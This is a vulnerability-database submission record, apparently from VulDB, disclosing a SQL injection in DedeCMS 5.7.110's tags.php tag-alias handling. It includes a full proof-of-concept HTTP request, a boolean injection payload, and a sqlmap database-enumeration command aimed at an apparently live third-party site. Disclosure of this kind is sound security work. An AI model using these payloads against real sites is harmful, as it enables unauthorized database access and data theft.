| Title | dedecms sql injection |
|---|
| Description | Website: www.dedecms.com/
Affected version: DedeCMS V5.7.110
Vulnerability description: dedecms's tag query interface has SQL injection, using the variable $tag_alias to interpolate strings in SQL query statements,
and does not perform any filtering or escape processing on $tag_alias. This allows malicious users to inject malicious SQL code by constructing specific URL parameters.
Attackers can use this to steal sensitive information such as databases.
POC :
GET /uploads/tags.php?QUERY_STRING=alias/alias/bbb* HTTP/1.1
Host: 127.0.0.1
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1689668702,1689755217,1689908948,1690348034; Hm_lvt_f8cddee34ca21f05373a9388cfdd798b=1691473417
Connection: close
SQLmap:
sqlmap.py -u "http://list.beijingcloud.com.cn/tags.php?QUERY_STRING=alias/alias/bbb*" -dbs --batch
Payload: http://127.0.0.1:80/uploads/tags.php?QUERY_STRING=alias/alias/bbb' AND 8367=8367 AND 'yMwU'='yMwU |
|---|
| Source | ⚠️ https://github.com/laoquanshi/cve |
|---|
| User | heishou (UID 53637) |
|---|
| Submission | 08/30/2023 04:49 (3 years ago) |
|---|
| Moderation | 09/03/2023 09:01 (4 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 238636 [DedeCMS 5.7.110 /uploads/tags.php tag_alias sql injection] |
|---|
| Points | 18 |
|---|